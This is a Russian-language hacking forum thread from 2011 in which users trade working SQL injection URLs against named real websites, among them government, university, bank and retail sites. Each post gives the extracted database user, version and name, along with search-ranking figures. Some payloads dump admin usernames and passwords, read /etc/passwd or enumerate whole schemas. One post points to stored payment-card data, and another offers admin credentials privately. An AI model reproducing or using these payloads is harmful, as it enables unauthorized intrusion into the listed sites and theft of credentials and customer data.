http://www.hkyongnuo.com/e-detail.php?ID=-281+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40+--+
web2u16@127.0.0.1:5.1.56:web2db16
PR 3
тИЦ 20
winstrool
27.07.2011, 13:01
http://www.sirius55.ru/order.php?id=-737'+union+select+1,concat_ws(0x3a,user(),version( ),database()),3,4,5,6,7,8,9,0+--+
sirius55ru@localhost:5.0.56-lk-log:sirius55ru
http://dushevaya.ru/order.php?id=-490'+UnIon+selECt+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7+--+
dushevaya@localhost:5.1.49-3:dushevaya
http://www.slidell.la.us/cal-view.php?ID=-712+UnIon+selECt+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46+--+
slidell@localhost:4.1.22-log:cityofslidell
Решил малость прикалоться))
http://www.stearnslending.com/about-us/news-item.php?id=-26+union+select+1,2,unhex(hex(concat_ws(0x3a,user( ),version(),database()))),(select(@x)from(select(@ x:=0x00),(select(0)from(information_schema.columns )where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,tab le_schema,0x2e,table_name,0x3a,column_name))))x),5 +--+
ROOT@FTP.CUPARTNERS.COM:5.0.18-NT:STEARNS_LENDING_V11081
http://contactusconsulting.com/en/Page_ID.php?IDTXT=-57'+union+select+(select(@x)from(select(@x:=0x00), (select(0)from(information_schema.columns)where(ta ble_schema!=0x696e666f726d6174696f6e5f736368656d61 )and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema ,0x2e,table_name,0x3a,column_name,0x20202020207c,u ser(),0x3a,version(),0x3a,database()))))x)+--+
consulting09@L40170.solusoftware.com:5.0.77:consul ting_dbo
COOLBOY007
27.07.2011, 14:50
Code:
http://lingedelit.ru/category.php?id=-8+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9+--+
lingedelit_ru@vps1996.vps.host.ru:5.0.90:lingedeli t_ru
PR 1
тИЦ 10
Code:
http://www.zareformu.ru/index.php?id=-5303+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5+--+
borodin-mokaru@localhost:5.0.51a-24+lenny4:law
PR 2
*uNkN0Wn*
27.07.2011, 15:17
PHP:
http://www.romefortravellers.com/content.php?sez=-eventi'+union+select+1,2,3,user(),5,6+--+
Code:
http://vl2.gallaudet.edu/staff.php?id=-40+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13+--+
5.0.51a-community-nt
PR 6
P.S. Файлы читаются...
COOLBOY007
27.07.2011, 21:31
Code:
http://www.proauto.ws/view.php?id=-1436+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5,6+--+
pux161_proauto@localhost:5.0.91-community:pux161_proauto
PR 2
тИЦ 10
Code:
http://www.microkino.ru/view.php?id=-214+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5+--+
microkino@localhost:5.0.70:microkino
PR 2
тИЦ 20
Code:
http://www.lestnicy.net/category.php?id=-84+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8+--+
lestnic4_borik@localhost:4.1.25-log:lestnic4_shop
PR 2
тИЦ 20
Code:
http://privatehotel.net.ua/order.php?ad=-305+union+select+concat_ws(0x3a,user(),version(),d atabase()),2,3,4,5,6,7+--+
sotrudnik_vert@localhost:5.1.40-log:sotrudnik_photel
Code:
http://avtounion.ru/news/article.php?id=-1040+union+select+1,2,3,4,5,6,concat_ws(0x3a,user( ),version(),database()),8+--+
u109358@78.108.84.141:5.0.90:b109358
PR 2
тИЦ 50
Code:
http://www.intforus.ru/vuz-info.php?id=-15+union+select+concat_ws(0x3a,user(),version(),da tabase())+--+
portal@localhost:5.0.32-Debian_7etch12-log:cmiir
PR 1
тИЦ 20
Code:
http://copyright.net.au/buynow.php?id=-1+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3,4,5,6--
PR 4
В customer_order содержится инфа о пластике..
http://www.deitch.com/projects/slide_pop.php?imageId=2405+union+select+1,2,3,4,%2 8select%28@x%29from%28select%28@x:=0x00%29,%28sele ct%28null%29from%28information_schema.columns%29wh ere%28table_schema!=0x696e666f726d6174696f6e5f7363 68656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c6 2723e,table_schema,0x2e,table_name,0x3a,column_nam e%29%29%29%29x%29,6,7,8--&name=
HellFire
28.07.2011, 02:14
Code:
http://www.identitycrowd.com/buy_brands.php?category_id=1-0.1+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E ,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User() ,0x7873716C696E6A656E64),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23--
Database Version: 5.0.92-community-log
Database name: identity_preview
User name: identity_ident@localhost
Шоп логотипов и каких-то картинок.
Code:
http://www.reggaefrance.com/player/videoplayer.php?num=1-0.1+UNION+SELECT+1,2,CONCAT(0x7873716C696E6A626567 696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,Us er(),0x7873716C696E6A656E64),4,5,6,7,8,9,10,11,12, 13--
Database Version: 5.0.44
Database name: rf_web
User name: reggaefr@localhost
Всем французская рагга пасаны. ^^
Code:
http://www.andademiparte.com/cupon.php?id=-205'+union+select+1,2,3,concat_ws(0x3a,id,user,pas s),5,6,7,8,9,10,11,12,13,14+from+usuarios+--+
5.5.8-log
PR 3
HellFire
28.07.2011, 06:14
Code:
http://www.technique-extreme.com/english/sommaire_produits.php?num_sommaire=1-0.1+UNION+SELECT+1,2,3,4,5,CONCAT(0x7873716C696E6A 626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2 A2F,User(),0x7873716C696E6A656E64),7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23--
Database Version: 5.0.77
Database name: dbtechniqueextreme
User name: web12500@localhost
Какой-то горнолыжный гавно-шоп.
Code:
http://citya.com/actualites.php?num_actu=1-0.1+UNION+SELECT+1,CONCAT(0x7873716C696E6A62656769 6E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User (),0x7873716C696E6A656E64),3,4,5,6,7,8,9--
Database Version: 5.0.51a-24+lenny2-log
Database name: site_citya
User name: citya@citya1.ics.infoclip.fr
Французская недвижимость.
Code:
http://www.oswaldspharmacy.com/product.php?id=1-9999999.99999+UNION+SELECT+1,CONCAT(0x7873716C696E 6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2 A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8,9--
Database Version: 5.0.77-log
Database name: 360851_oswalds
User name: 360851_admin@172.16.16.54
Пендоская фарма.
COOLBOY007
28.07.2011, 15:21
Code:
http://www.genichesk.com.ua/album/view.php?id=-554+union+select+1,2,concat_ws(0x3a,user(),version (),database()),4+--+
u_genichesk@localhost:5.0.51a-15:genichesk
PR 3
тИЦ 50
Code:
http://www.stroytechmarket.ru/order.php?id=721&pid=146%20and%28select%201%20from%28select%20count %28*%29,concat%28%28select%20%28concat_ws%280x3a,u ser%28%29,version%28%29,database%28%29%29%29%20fro m%20%60information_schema%60.tables%20limit%200,1% 29,floor%28rand%280%29*2%29%29x%20from%20%60inform ation_schema%60.tables%20group%20by%20x%29a%29%20a nd%201=1
stroytec_db@localhost:5.1.44:stroytec_db1
PR 3
тИЦ 20
Code:
http://www.ilcanecorso.ru/dogs/view.php?id=-8+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3,4,5,6+--+
ilcaneco@89.111.176.105:4.1.25-log:wwwilcanecorsoru
PR 3
тИЦ 60
Code:
http://www.ghkandt.com/order.php?id=-9%20and%28select%201%20from%28select%20count%28*%2 9,concat%28%28select%20%28concat_ws%280x3a,user%28 %29,version%28%29,database%28%29%29%29%20from%20%6 0information_schema%60.tables%20limit%200,1%29,flo or%28rand%280%29*2%29%29x%20from%20%60information_ schema%60.tables%20group%20by%20x%29a%29%20and%201 =1
ghkandtc1@localhost:5.1.28-rc:ghkandtc11
PR 3
тИЦ 60
Cennarios
29.07.2011, 01:02
Прэлесно )))
http://www.unidir.org/bdd/fiche-article.php?ref_article=-2759+union+select+1,2,3,4,user%28%29,6,7,8,9,10,11 ,12,13,14,15,16,17--+
*uNkN0Wn*
29.07.2011, 13:51
PHP:
http://www.asiademocracy.org/content_view.php?section_id=-11+union+select+1,user(),3,4+--+
VERSION : 5.1.58-community-log
DATABASE : sghumanr_arda
USER : sghumanr_arda@localhost
PR - 4
PHP:
http://www.manilawater.com/section.php?section_id=2+union+select+1,2,3,concat (database(),char(59),version(),char(59),user()),5, 6,7,8,9,10+--+
DATABASE : db123289_manilawater
VERSION : 5.1.55-rel12.6
USER : db123289_erik@205.186.176.17
COOLBOY007
29.07.2011, 15:46
Code:
http://www.indexcopernicus.com/info.php?id=6%20and%28select%201%20from%28select%2 0count%28*%29,concat%28%28select%20%28concat_ws%28 0x3a,user%28%29,version%28%29,database%28%29%29%29 %20from%20%60information_schema%60.tables%20limit% 200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60 information_schema%60.tables%20group%20by%20x%29a% 29%20and%201=1
User: panel@ic-i_fire-ny.indexcopernicus.com
Version: 5.0.26-Max-log
Database: indexcoper
PR 6
тИЦ 20
*uNkN0Wn*
29.07.2011, 18:02
PHP:
http://www.omlxi.com/project.php?php_ex=-1+union+select+concat(database(),char(59),version( ),char(59),user())+--+
VERSION : 5.1.58-community-log
DATABASE : omlxicom_work
USER : omlxicom_wrkuser@localhost
PR - 2
Вывод в тайтле
PHP:
http://sanovide.com/diet_subcategory.php?sub_cat_id=-17+union+select+1,concat(database(),char(59),versi on(),char(59),user()),3,4,5,6,7,8,9+--+
VERSION : 5.0.77
DATABASE : Sanovide
USER : Sanovide@Localhost
PR - 2
PHP:
http://www.mysoutherntier.com/view_bus_cats.php?sub_cat_id=-152+union+select+1,concat(database(),char(59),vers ion(),char(59),user()),3+--+
VERSION : 5.1.56
DATABASE : mysouthe_mysoutherntier
USER : mysouthe_mysouth@localhost
PR - 2
Вывод в тайтле
Osstudio
29.07.2011, 22:03
Code:
http://www.laitkipers.ru/news.php?id=40+and+false+union+select+1,unhex%28he x%28concat%28user_name,0x3a,user_pass%29%29%29,3,4 ,5,6+from+user--+
ТИЦ: 10
PR: 1
Code:
http://www.yorkshirecoastcollege.ac.uk/news.php?id=479+and+(select+1+from+(select+count(0 ),concat((select+version()),floor(rand(0)*2))+from +(select+1+union+select+2+union+select+3)x+group+b y+2+limit+1)a)
ТИЦ: 0
PR: 6
Code:
http://rumafia.com/ru/news.php?id=-214+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14,15,16+--+
ТИЦ: 20
PR: 3
Code:
http://goldenformula.net/news.php?id=48+and+1=0+union+select+1,2,3,4,versio n%28%29,6--
ТИЦ: 100
PR: 4
PHP:
http://www.frontviewsgallery.de/exhibition.php?exhibition_id=6+union+select+1,vers ion%28%29,3,4,5,6,7,8,9,10,11--
Osstudio
30.07.2011, 00:12
Code:
http://www.astrakhanfm.ru/news/news.php?id=27341+and+1=0+union+select+1,version%2 8%29,database%28%29,4,user%28%29,6,7--
ТИЦ: 200
PR: 5
COOLBOY007
30.07.2011, 00:18
Code:
http://www.glimz.net/info.php?individual=4603%20and%28select%201%20from %28select%20count%28*%29,concat%28%28select%20%28c oncat_ws%280x3a,user%28%29,version%28%29,database% 28%29%29%29%20from%20%60information_schema%60.tabl es%20limit%200,1%29,floor%28rand%280%29*2%29%29x%2 0from%20%60information_schema%60.tables%20group%20 by%20x%29a%29%20and%201=1
User: glimz_net@srv11.one.com
Version: 5.0.51a-24+lenny5-log
Database: glimz_net1
PR 5
тИЦ 10
Osstudio
30.07.2011, 00:21
Code:
http://ngfrussia.ru/news.php?id=524+and+1=0+union+select+1,database%28 %29,version%28%29,4,5,6,7,8,9,10--
DataBase: ngf
Version DB: 5.0.77
User BD: leni@localhost
ТИЦ: 40
PR: 3
Code:
http://www.chexov.net/news.php?id=571+union+select+user%28%29,database%2 8%29,3,4,version%28%29,6+--+
DataBase: u155206
Version DB: 5.0.77-log
User BD: u155206@localhost
ТИЦ: 4
PR: 3
P.S Смотрите комментарии
Code:
http://www.hellolulu.com/group.php?cat1_id=-1+union+select+1,2--
http://www.hellolulu.com/admin/
PR: 2
version: 5.0.45
user: hellolul@localhost
database: hellolul01
COOLBOY007
30.07.2011, 15:00
Code:
http://bwd.eea.europa.eu/kml_export.php?cc=' union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),da tabase()),10,11,12,13,14,15,16,17,18,19,20 and 'x'='x
User: bwdfull@localhost
Version: 5.0.77
Database: bwd
PR 9
тИЦ 4800
P.S. На данном сайте уже была найдена (https://antichat.live/showpost.php/p/1936892/postcount/11543/) уязвимость, но на другом поддомене с другой БД.
Osstudio
30.07.2011, 16:15
Code:
http://fishres.ru/news/news.php?id=14572+and+1=0+union+select+1,2,user%28 %29,version%28%29,5,6,7,8,database%28%29--
DataBase: murfish4_test
Version DB: 4.0.27-log
User BD: murfish4_test@v28.valuehost.ru
ТИЦ: 600
PR: 3
Code:
http://www.civilista.ru/news.php?id=22+and+1=0+union+select+1,2,0x4861636b 6564204279204f7373747564696f212121,version%28%29,5 ,database%28%29,7--
DataBase: u9620_civilista_ru
Version DB: 5.0.89-log
User BD: u9620@be2
ТИЦ: 20
PR: 2
P.S Обратите внимание на title
{
Current DB: u9620_civilista_ru
Data Base Found: information_schema
Data Base Found: u9620
Data Base Found: u9620_biruk
Data Base Found: u9620_cb
Data Base Found: u9620_civilista
Data Base Found: u9620_civilista_ru
Data Base Found: u9620_mediator
Data Base Found: u9620_mucb
Data Base Found: u9620_prav66
Data Base Found: u9620_prav66_forum
Data Base Found: u9620_privlaw
Data Base Found: u9620_zagovor
Data Base Found: u9620_zhurnal
Data Base Found: u9620_zhurnal_new
Введём тут http://2ip.ru/domain-list-by-ip/ наш сайт, и получим сайты из этих баз.
}
Code:
http://kolesaonline.ru/news.php?id=66+and+1=0+union+select+1,version%28%2 9,database%28%29,user%28%29,5,6--
DataBase: kolesa
Version DB: 4.1.25-log
User BD: kolesa-sql@localhost
ТИЦ: 120
PR: 2
Code:
http://www.fauna-servis.ua/news.php?id=407+and+1=0+union+select+1,2,0x4861636 b6564204279204f7373747564696f2121,4,5,6,concat_ws% 280x3a3a3a,user%28%29,database%28%29,version%28%29 %29,8,9,10,11,12--
DataBase: faunaservis
Version DB: 5.0.51a-24+lenny5
User BD: u_faunaservi@localhost
ТИЦ: 50
PR: 3
Osstudio
30.07.2011, 17:37
Code:
http://www.rody18.spb.ru/news.php?id=51+and+1=0+union+select+1,2,0x59612076 65726e756c73796121,concat_ws%280x3a3a3a,user%28%29 ,database%28%29,version%28%29%29,5,6,7,0x3a44--
DataBase: db00143987
Version DB: 4.1.25-log
User BD: 00143987@localhost
ТИЦ: 30
PR: 3
COOLBOY007
30.07.2011, 18:41
Code:
http://n-europe.eu/content/index.php?p=1262%20and%28select%201%20from%28selec t%20count%28*%29,concat%28%28select%20%28concat_ws %280x3a,user%28%29,version%28%29,database%28%29%29 %29%20from%20%60information_schema%60.tables%20lim it%200,1%29,floor%28rand%280%29*2%29%29x%20from%20 %60information_schema%60.tables%20group%20by%20x%2 9a%29%20and%201=1
User: u3249_old@localhost
Version: 5.1.57-rel12.8
Database: u3249_old1
PR 6
тИЦ 300
P.S. Смотрим исходный код страницы, ошибка закомментирована.
http://www.mbzspeciesconservation.org/includes/get-data/getCountries.php?countryCode=-4+union+select+1,2,(select(@x)from(select(@x:=0x00 ),(select(null)from(information_schema.columns)whe re(table_schema!=0x696e666f726d6174696f6e5f7363686 56d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_s chema,0x2e,table_name,0x3a,column_name))))x)--
http://www.atic.ae/ar/media-center/generate-html-Ar.php?id=483+union+select+1,2,0x323030302d30312d3 031,4,5,6,7,8,9,0,(select(@x)from(select(@x:=0x00) ,(select(null)from(information_schema.columns)wher e(table_schema!=0x696e666f726d6174696f6e5f73636865 6d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_sc hema,0x2e,table_name,0x3a,column_name))))x)--
*uNkN0Wn*
30.07.2011, 20:33
PHP:
http://www.angstromloudspeakers.com/item_list.php?sub_cat_id=-149+union+select+concat(database(),char(59),versio n(),char(59),user())+--+
VERSION : 4.1.22-standard
DATABASE : angstrom_sysdata
USER : angstrom_u0708@localhost
PR - 3
PHP:
http://www.aquaticdepot.net/sub_category_desc.php?sub_cat_id=-8+union+select+1,2,concat(database(),char(59),vers ion(),char(59),user()),4,5,6+--+
VERSION : 5.0.91-log
DATABASE : db264189880
USER : dbo264189880@74.208.16.36
PHP:
http://www.medicaltourismmag.com/detail.php?Req=199+union+select+1,2,3,4,5,6,7,8,9, 10,11,concat(database(),char(59),version(),char(59 ),user()),13,14,15,16,17+--+
VERSION : 5.0.92-community-log
DATABASE : medicalm_mtm
USER : medicalm_mtm@localhost
PR - 4
PHP:
http://www.greyblue.net/MidnightBlue/story.php?storyid=-2+union+select+1,2,concat(database(),char(59),vers ion(),char(59),user()),4,5,6,7,8+--+
VERSION : 5.1.53-log
DATABASE : greyblue
USER : greybluedbuser@seahawks.dreamhost.com
PR - 1
PHP:
http://www.thecardchest.com/sid/viewStory.php?storyID=-243+union+select+1,2,concat(database(),char(59),ve rsion(),char(59),user()),4+--+
VERSION : 5.0.77
DATABASE : sid
USER : sidUser@localhost
PR - 3
Osstudio
30.07.2011, 20:36
Code:
http://www.club-crosswind.com/news.php?id=161+and+1=0+union+select+1,2,3,4,5,6,0 x4861636b6564206279204f7373747564696f212121,concat _ws%280x3a3a3a,user%28%29,database%28%29,version%2 8%29%29--
DataBase: clubcrosswindcom
Version DB: 5.0.51a-24+lenny4-log
User BD: clubcrosswindcom@localhost
ТИЦ: 40
PR: 4
Code:
http://vniisubtrop.ru/news.php?id=1+and+1=0+union+select+1,2,version%28% 29,4,5,6,7,database%28%29--
DataBase: gb_vnii
Version DB: 5.0.54-log
User BD: gb_vnii@81.176.226.188
ТИЦ: 20
PR: 2
Cennarios
31.07.2011, 22:17
http://www.safmuseum.org/pages/bio.php?id=-70%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,version%28%29,23,24,25,26,2 7--+from+admins--+.html
И еще чутка г**на:
http://www.starkeyhearingfoundation.org/post-event.php?id=-41+union+select+1,2,3,4,5,6,7,8,user%28%29,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+
Osstudio
01.08.2011, 19:46
Code:
http://www.noutov.info/news.php?id=7+and+1=0+union+select+1,2,version%28% 29,database%28%29,5,6,7--
DataBase: dbeuronout
Version DB: 4.0.26-log
User BD: noutov@localhost
ТИЦ: 30
PR: 2
COOLBOY007
01.08.2011, 20:53
Code:
http://www.stella-science.eu/initiatives_view.php?id=710 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: stella@localhost
Version: 5.0.77-log
Database: stella1
PR 5
Code:
http://www.burko.eu/index.php?id=22.2%20union%20all%20select%20concat_ ws%280x3a,user%28%29,version%28%29,database%28%29% 29+--+
User: root@localhost
Version: 5.1.56
Database: today
PR 1
SQLI
Code:
_http://uventa-spb.ru/index.php?new=1+union+select+1,2,username,4,5,6,7, 8,8+from+z102451_uventa.jv_users+where+id=1+--+
5.1.49-3-log
z102451_uventa
z102451_uventa@77.221.130.24
==================================================
BSQLI
Code:
_http://ruselt.ru/news.php?id=1&page=191+union+select+1,2,3,4,5,6,7,8+--+
5.0.90-log
u33206
u33206@10.8.1.176
==================================================
SQLI
Code:
_http://www.lyceumtheatre.org/production.php?id=1+union+select+1,2,3,4,5,6,7,8,9 ,1,2,3,4,5,6,7,8,9,1,1,1,1+--+
5.0.51a-3ubuntu5.1
lyceumtheatre
testlyceum@localhost
COOLBOY007
01.08.2011, 22:47
stranger1341 said:
www.sklepy-online.pl/?exec=showscat&id=51'
помогите найти логин и пароль к админке
stranger1341, за данными админа в ЛС.
Code:
http://www.sklepy-online.pl/?exec=showscat&id=51.1'+union+select+concat_ws(0x3a,user(),versio n(),database()),2+and+'x'='x
User: sql_arteesoft13@localhost
Version: 5.1.49-3
Database: sql_arteesoft13_so
PR 4
Cennarios
02.08.2011, 00:19
http://www.census.gov/ces/whatsnew/newsarchive.php?more=-10+union+select+1,2,3,4,5,6--+
Osstudio
02.08.2011, 15:24
Code:
http://www.prokitetour.com/news.php?id=185%27+and+1=0+union+select+1,2,3,vers ion%28%29,database%28%29,user%28%29,7,8+--+
DataBase: db271821761
Version DB: 5.0.77
User BD: db271821761@localhost
ТИЦ: 20
PR: 4
*uNkN0Wn*
02.08.2011, 16:25
PHP:
http://www.copycentral.com/location.php?lid=-9+union+select+1,2,3,concat(database(),char(59),ve rsion(),char(59),user()),5,6,7,8,9,10,11,12,13,14+--+
VERSION : 5.0.91-log
DATABASE : copycent_data
USER : copycent_data@72.167.232.72
PR - 4
http://www.itkor.ru/cnews/index.phtml?dt=-731%20union%20select%201,concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),3%20--
4.1.22-standard itkorru_adm@localhost itkorru_market unknown-linux-gnu
COOLBOY007
03.08.2011, 14:00
Code:
http://www.agendafin.com/article.php?ID=94.9 union all select 1,concat_ws(0x3a,user(),version(),database()),3,4, 5,6,7,8+--+
User: 27629@62.73.58.147
Version: 5.0.51a-24+lenny5
Database: db27629
PR 4
Code:
http://www.hitnews.eu/index.php?id=43.9 union all select 1,2,concat_ws(0x3a,user(),version(),database())+--+
User: hitmans@localhost
Version: 4.1.22
Database: hitnews2
PR 4
тИЦ 10
Code:
http://www.museumofconflict.eu/singletext.php?id=9.9' union all select 1,concat_ws(0x3a,user(),version(),database()),3,4, 5,6 and 'x'='x
User: nuke290@localhost
Version: 4.1.22
Database: MC
PR 4
winstrool
03.08.2011, 14:42
http://www.ilada.ru/catalog.php?tovid=-85+UnIon+selECt+concat_ws(0x3a,user(),version(),da tabase())+--+
list43_lada@v29.valuehost.ru:4.0.27-max-log:list43_lada
http://www.rockstore.ru/catalog.php?modul=goods&group=418&id=-3825+UnIon+selECt+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8,9,10,11,12+--+
dbu_soultek7_1@192.168.6.37:5.0.77-log:db_soultek7_4
http://www.momo.it/products.php?id_cat=1&id_subcat=1&id_product=-4'+UnIon+selECt+1,2,3,4,5,6,concat_ws(0x3a,user(), version(),database()),8,9,10,11,12,13,14,15+--+
momoit_db@localhost:5.0.51a-24+lenny5:momoit_momoitdb
http://www.georgeturnermodels.com/index.php?page=shopping&shop_cat_id=5'+union+select+1,2,3,4,concat_ws(0x3a ,user(),version(),database()),6,7+--+
web227-gtm@localhost:5.1.56-community-log:web227-gtm
http://www.komiks.cz/clanek.php?id=-270'+UnIon+selECt+1,2,3,4,concat_ws(0x3a,user(),ve rsion(),database()),6,7,8,9,10,11,12,13,14,15+--+
a3003_komiks@10.28.8.5:5.5.9:d3003_komiks
http://www.magnit.dp.ua/show_cat.php?catid=-5+/*!%75nion+%73elect*/+1,concat_ws(0x3a,user(),version(),database()),3,4 ,5,6,7,8++--+
magnitd_magnit@trio.hosted.in:5.0.91:magnitd_magni t
http://www.islinc.com/Cyber_Security_Evaluations/nist_glossary.php?id=1'+union+select+(select(@x)fr om(select(@x:=0x00),(select(0)from(information_sch ema.columns)where(table_schema!=0x696e666f726d6174 696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3 c62723e,table_schema,0x2e,table_name,0x3a,column_n ame))))x),2+--+
glassfis_isl@208.76.193.150:5.0.92-community:glassfis__ISL_CyberSecurity
http://www.novocor-group.ru/cat_item.php?sid=92+union+select+concat_ws(0x3a,us er(),version(),database()),2+--+
novocor@zvm8.host.ru:4.0.27-log:novocor
http://www.orenskidki.ru/page_id.php?id=886+union+select+1,2,concat_ws(0x3a ,user(),version(),database()),4,5+--+
skidki@localhost:5.1.41-3ubuntu12.10:skidki
Code:
http://www.roshinskiy.ru/page.php?id=24%27+or+1+group+by+concat%28user%28%2 9,version%28%29,database%28%29,floor%28rand%280%29 *2%29%29having+min%280%29+or+1--+
User:malishasti_rosh@localhost
Database:malishasti_rosh
Version:5.0.26-log
PR:1
тИЦ:20
Cennarios
04.08.2011, 03:19
http://www.ait.com/searchdetails.php?cid=-920%27+union+select+1,version%28%29,3,4,5,6,7,8,9, 10--+
http://old.cageprisoners.com/articles.php?id=-25632+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),ver sion(),database()),5,6#
cagepris_user@localhost:5.0.84:cagepris_cms
Яндекс тИЦ: 10
Google PageRank: 5/10
Code:
http://fond.jazzandclassic.ru/need_help.php?id=-34+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13+--+
БЛАГОТВОРИТЕЛЬНЫЙ ФОНД ПОДДЕРЖКИ КУЛЬТУРЫ И МИЛОСЕРДИЯ «ДЖАЗ И КЛАССИКА»
5.0.90-log
тИЦ 20
PR 4
Code:
http://www.tinos-tinos.com/destination.php?destinationid=-246+union+select+1,2,3,concat_ws(0x3a,id,user,pass ,email),5+from+faqAdmin+--+
5.1.41-3ubuntu12.10-log
PR 3
--
Code:
http://www.genomics.cn/en/platform.php?id=-67+union(select+concat_ws(0x3a,username,password), 2,3,4,5+from+cms_users+limit+1,1)+--+
5.0.77-log
тИЦ 20
PR 6
Code:
http://www.worstpreviews.com/moviereviews.php?id=-266+union+select+version(),2+--+
5.1.56-log
тИЦ 120
PR 5
Code:
http://www.kayafm.co.za/features.php?id=-47+union+select+1,version(),3,4,5,6,7,8,9+--+
5.0.92-community
PR 5
winstrool
05.08.2011, 18:42
http://www.little-boy.ru/catalog.php?season=-3+union+select+(select(@x)from(select(@x:=0x00),(s elect(0)from(information_schema.columns)where(tabl e_schema!=0x696e666f726d6174696f6e5f736368656d61)a nd(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0 x2e,table_name,0x3a,column_name))))x)+--+
littlebo_littboy@localhost:5.1.56-log:littlebo_cat
http://www.salaam.co.uk/links/show_links.php?sub_cat_id_link=289+union+select+ve rsion()||chr(58)||current_user||chr(58)||current_d atabase()+#+--+&main_cat_id_link=157
PostgreSQL 8.1.9 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52):custdb:salaam
http://c-sklad.ru/contact.html?id=-1+UnIon+selECt+1,2,3,concat_ws(0x3a,user(),version (),database()),5,6,7,8,load_file(0x2f6574632f70617 3737764),(select(@x)from(select(@x:=0x00),(select( 0)from(information_schema.columns)where(table_sche ma!=0x696e666f726d6174696f6e5f736368656d61)and(0x0 0)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,ta ble_name,0x3a,column_name))))x),11+--+
csklad@localhost:5.1.46:csklad
http://blog.evpetrov.com/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1133')%20UNION%20ALL%20SELECT%201,2,user()--%20
http://amp.genomics.org.cn/markerDetail.php?ID=3-AP002039-2773'+and+1=2+union/**/select+1,2,3,4,5,6,7,8,user(),0,version(),12,13,14 ,15,16,17,18,'19
http://www.metalac.com/pgs/sr/press/?year=2011&month=05&newsid=-148+union+select+1,2,3,4,5,(select(@x)from(select( @x:=0x00),(select(null)from(information_schema.col umns)where(table_schema!=0x696e666f726d6174696f6e5 f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e ,table_schema,0x2e,table_name,0x3a,column_name)))) x),7,8,9--
Chambers Bank
Code:
http://www.chambers-bank.com/service_details.php?id=-11+union+Select+1,2,group_concat(column_name),4,5, 6+from+information_schema.columns+where+table_name =0x6c6f636174696f6e73
version: 5.0.77-LOG
database: CHECKIN_DB
user: CHECKIN_ADMIN@208.38.137.5
Code:
http://pregled-rs.com/products2.php?id=-1+union+Select+1,concat_ws(0x3a,version(),database (),user())+--+
version: 5.0.45
database: ys2
user: ys2@localhost
Code:
http://www.mobilesfever.com/softwares/softwares_category.php?id=-1+union+Select+1,concat_ws%280x3a,version%28%29,da tabase%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12+--+
version: 5.0.92-community-log
database: mobilesf_soft
user: mobilesf_soft@localhost
Code:
http://www.alians-auto.ru/index.php?mode=content&id=-1+union+Select+1,2,group_concat(table_name+separat or+0x3a3a),4,5,6+from+information_schema.tables+wh ere+table_schema=0x616c69616e735f6e657773+--+
version: 5.0.51a-log
database: alians_news
user: alians_news@217.112.35.43
Code:
http://hist.web.tstu.ru/prepod.php?id=-1+union+Select+1,concat_ws(0x3a,version(),database (),user()),3,4+--+
version: 5.1.50-MariaDB
database: hist
user: hist@localhost
Code:
http://www.isleofdogs.ru/catalog.php?id=-2+union+Select+concat_ws%280x3a,version%28%29,data base%28%29,user%28%29%29+--+
version: 5.0.70-log
databse: gb_isleofdogs
user: gb_isleofdogs@10.0.2.7
Code:
http://www.playonline.com.ua/game.php?id=-978%29%20union%20select%201,2,concat_ws%280x3b,use r%28%29,version%28%29,database%28%29,@@version_com ment,SESSION_USER%28%29,CURRENT_USER%28%29,SYSTEM_ USER%28%29,@@version_compile_machine,@@version_com pile_os,@@basedir,@@datadir,@@tmpdir%29,4,5,6,7,8, 9--+
user: dvdpoisk_pl@localhost
database: dvdpoisk_pl
version: 5.0.51a-community
Code:
